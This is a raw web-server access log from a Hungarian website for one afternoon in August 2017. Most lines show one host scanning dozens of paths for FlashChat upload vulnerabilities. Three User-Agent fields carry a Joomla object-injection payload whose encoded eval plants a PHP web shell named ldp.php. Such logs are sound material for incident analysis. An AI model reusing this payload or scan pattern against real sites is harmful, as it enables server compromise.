204.12.211.170 - - [30/Aug/2017:14:26:37 +0200] "GET /e-dinar-chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:37 +0200] "POST /forums/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:37 +0200] "GET /forums/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:37 +0200] "POST /chat-stjepkovica/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:37 +0200] "GET /chat-stjepkovica/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:38 +0200] "POST /community/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:38 +0200] "GET /community/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:38 +0200] "POST /board/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:38 +0200] "GET /board/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:39 +0200] "POST /roommate/flash_chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:39 +0200] "GET /roommate/flash_chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:39 +0200] "POST /e107_plugins/onlineinfo_menuupload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:39 +0200] "GET /e107_plugins/onlineinfo_menutemp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:40 +0200] "POST /shbt/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:40 +0200] "GET /shbt/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:40 +0200] "POST /haces/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:40 +0200] "GET /haces/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:41 +0200] "POST /chat-bebica/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:41 +0200] "GET /chat-bebica/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:41 +0200] "POST /smf/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:41 +0200] "GET /smf/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:41 +0200] "POST /FlashChat_v608/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:42 +0200] "GET /FlashChat_v608/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:42 +0200] "POST /public/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:43 +0200] "GET /public/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:43 +0200] "POST /foro/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:43 +0200] "GET /foro/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:44 +0200] "POST /islamski-chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:44 +0200] "GET /islamski-chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:44 +0200] "POST /chat-sem-registo/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:44 +0200] "GET /chat-sem-registo/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:45 +0200] "POST /chat55/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:45 +0200] "GET /chat55/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:46 +0200] "POST /flashchat-2/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:46 +0200] "GET /flashchat-2/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:46 +0200] "POST /cchat/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:46 +0200] "GET /cchat/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:46 +0200] "POST /xfchat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:47 +0200] "GET /xfchat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:47 +0200] "POST /chatroom/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:48 +0200] "GET /chatroom/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:49 +0200] "POST /radiodalmatino/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:49 +0200] "GET /radiodalmatino/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:49 +0200] "POST /blog-chat/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:49 +0200] "GET /blog-chat/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:49 +0200] "POST /FlashChat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:50 +0200] "GET /FlashChat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:50 +0200] "POST /blog-chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:52 +0200] "GET /blog-chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:52 +0200] "POST /tag/flashchat-v6-0-8/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:53 +0200] "GET /tag/flashchat-v6-0-8/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:53 +0200] "POST /deface_flashchat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:53 +0200] "GET /deface_flashchat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:53 +0200] "POST /topic/page/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:53 +0200] "GET /topic/page/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:54 +0200] "POST /page/video/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:56 +0200] "GET /page/video/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:56 +0200] "POST /vid/watch/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:56 +0200] "GET /vid/watch/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:56 +0200] "POST /tutaf/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:56 +0200] "GET /tutaf/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:57 +0200] "POST /baixar/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:57 +0200] "GET /baixar/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:57 +0200] "POST /how-to-install-flashchat-free/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:26:59 +0200] "GET /how-to-install-flashchat-free/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:00 +0200] "POST /music-search/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:00 +0200] "GET /music-search/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:00 +0200] "POST /search/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:00 +0200] "GET /search/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:01 +0200] "POST /mp3/list/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:01 +0200] "GET /mp3/list/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:01 +0200] "POST /jingyan/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:03 +0200] "GET /jingyan/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:03 +0200] "POST /exploit/description/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:03 +0200] "GET /exploit/description/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:04 +0200] "POST /exploits/28709/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:04 +0200] "GET /exploits/28709/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:04 +0200] "POST /radiopoljubac/posts/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:04 +0200] "GET /radiopoljubac/posts/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:05 +0200] "POST /m/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:07 +0200] "GET /m/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:07 +0200] "POST /m/video/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:07 +0200] "GET /m/video/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:07 +0200] "POST /upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:07 +0200] "GET /temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:08 +0200] "POST /okolice-ilawa/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:08 +0200] "GET /okolice-ilawa/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:11 +0200] "GET / HTTP/1.1" 200 2023 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:207:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
204.12.211.170 - - [30/Aug/2017:14:27:14 +0200] "GET / HTTP/1.1" 200 2023 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:207:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
204.12.211.170 - - [30/Aug/2017:14:27:18 +0200] "GET /ldp.php HTTP/1.1" 404 1181 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:207:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
199.193.251.133 - - [30/Aug/2017:14:28:21 +0200] "HEAD / HTTP/1.1" 200 0 "https://www.inboundlinks.win/InboundLinks/mkk.zpok.hu" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
88.99.187.152 - - [30/Aug/2017:14:29:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:14:34:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
77.111.91.248 - - [30/Aug/2017:14:37:33 +0200] "GET /doc/konf_0807.pdf HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
80.77.124.233 - - [30/Aug/2017:14:37:42 +0200] "GET / HTTP/1.1" 200 2023 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
88.99.187.152 - - [30/Aug/2017:14:39:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:14:44:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:14:49:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
216.244.66.199 - - [30/Aug/2017:14:52:12 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
88.99.187.152 - - [30/Aug/2017:14:54:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:14:59:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:04:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:09:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:14:08 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:19:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
66.249.64.131 - - [30/Aug/2017:15:19:08 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.158 - - [30/Aug/2017:15:19:08 +0200] "GET /doc/ecseri_ut.pdf HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.99.187.152 - - [30/Aug/2017:15:24:09 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:29:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:34:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:39:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:44:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:15:49:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
216.244.66.245 - - [30/Aug/2017:15:53:37 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
88.99.187.152 - - [30/Aug/2017:15:54:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
157.55.39.55 - - [30/Aug/2017:15:58:07 +0200] "GET /hirlevel/vonattal1012.htm HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
88.99.187.152 - - [30/Aug/2017:15:59:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
89.132.16.4 - - [30/Aug/2017:16:04:01 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71"
89.132.16.4 - - [30/Aug/2017:16:04:01 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71"
88.99.187.152 - - [30/Aug/2017:16:04:06 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
217.69.133.70 - - [30/Aug/2017:16:05:07 +0200] "GET /robots.txt HTTP/1.0" 404 1181 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
217.69.133.70 - - [30/Aug/2017:16:05:08 +0200] "GET /hirlevel/tersegi-targyalasokhoz.pdf HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
217.69.133.239 - - [30/Aug/2017:16:07:01 +0200] "GET /doc/mkk_plakat_rgb.pdf HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
88.99.187.152 - - [30/Aug/2017:16:09:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
216.244.66.245 - - [30/Aug/2017:16:12:19 +0200] "GET /doc/legyel_te_is_buszke_kerekparos.pdf HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
88.99.187.152 - - [30/Aug/2017:16:14:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
88.99.187.152 - - [30/Aug/2017:16:19:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
115.61.92.16 - - [30/Aug/2017:16:20:28 +0200] "GET / HTTP/1.1" 200 2023 "-" "-"
88.99.187.152 - - [30/Aug/2017:16:24:07 +0200] "GET / HTTP/1.1" 200 2023 "-" "WebyMon uptime monitor v1.1"
176.63.26.213 - - [30/Aug/2017:16:27:41 +0200] "GET / HTTP/1.1" 200 2023 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
176.63.26.213 - - [30/Aug/2017:16:27:41 +0200] "GET /blog.jpg HTTP/1.1" 200 29833 "http://www.mkk.zpok.hu/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
